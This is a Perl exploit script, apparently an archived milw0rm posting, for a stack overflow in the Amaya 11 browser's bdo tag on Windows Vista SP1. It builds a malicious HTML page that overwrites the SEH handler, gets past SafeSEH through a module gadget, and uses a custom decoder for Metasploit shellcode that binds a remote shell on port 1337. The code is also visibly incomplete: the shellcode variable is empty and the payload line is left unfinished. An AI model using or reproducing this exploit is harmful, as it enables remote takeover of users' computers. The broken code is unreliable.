# Amaya 11 bdo tag stack overflow
# author: Rob Carter (cartrel@hotmail.com)
# targets: windows vista sp1
# modified the alpha-numeric shell-code
# from metasploit since the first 12 bytes
# didn't fall within the ASCII range of
# 0x01-0x7f. otherwise my payload would
# have been corrupted on the stack. wrote
# a 47-byte decoder to repair the shell-
# code to its original state.
# this exploit bypasses safeSEH by jumping
# to a pop pop push pop ret sequence in
# one of the amaya modules that has a
# constant base address in memory. ret's
# back to the stack, short jump over the
# overwritten SEH, decodes the first 12
# bytes of the shellcode and then runs
# the repaired shellcode to bind a shell
# on port 1337.
# $ perl amaya_sploit.pl > pwn.html
# the author is not responsible for any misuse of
# this code. it is intended for educational
# purposes only
# win32_bind - EXITFUNC=seh LPORT=1337 Size=709 Encoder=PexAlphaNum http://metasploit.com
my $shellcode =
# original first 12 bytes of shellcode:
# "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49".
$decoder =
"\x5b". # pop ebx
"\x5b". # pop ebx
"\x68\x6c\x02\x58\x6c". # push 0x6c58026c
"\x58". # pop eax
"\x01\x43\x38". # add dword ptr[ebx+38],eax
"\x68\x01\x01\x01\x10". # push 0x10010101
"\x58". # pop eax
"\x01\x43\x3c". # add dword ptr[ebx+3c],eax
"\x68\x01\x7f\x7f\x7f". # push 0x7f7f7f01
"\x58". # pop eax
"\x01\x43\x3c". # add dword ptr[ebx+3c],eax
"\x68\x11\x11\x01\x01". # push 0x01011111
"\x58". # pop eax
"\x01\x43\x40". # add dword ptr[ebx+40],eax
"\x68\x7f\x7f\x11\x11". # push 0x11117f7f
"\x58". # pop eax
"\x01\x43\x40"; # add dword ptr[ebx+40],eax
$payload =
"<bdo dir=\"".
"A" x 6905 .
"\x51\x55\x03\x10". # pop - pop - push - pop - ret 0c
print $payload;
# milw0rm.com [2009-02-04]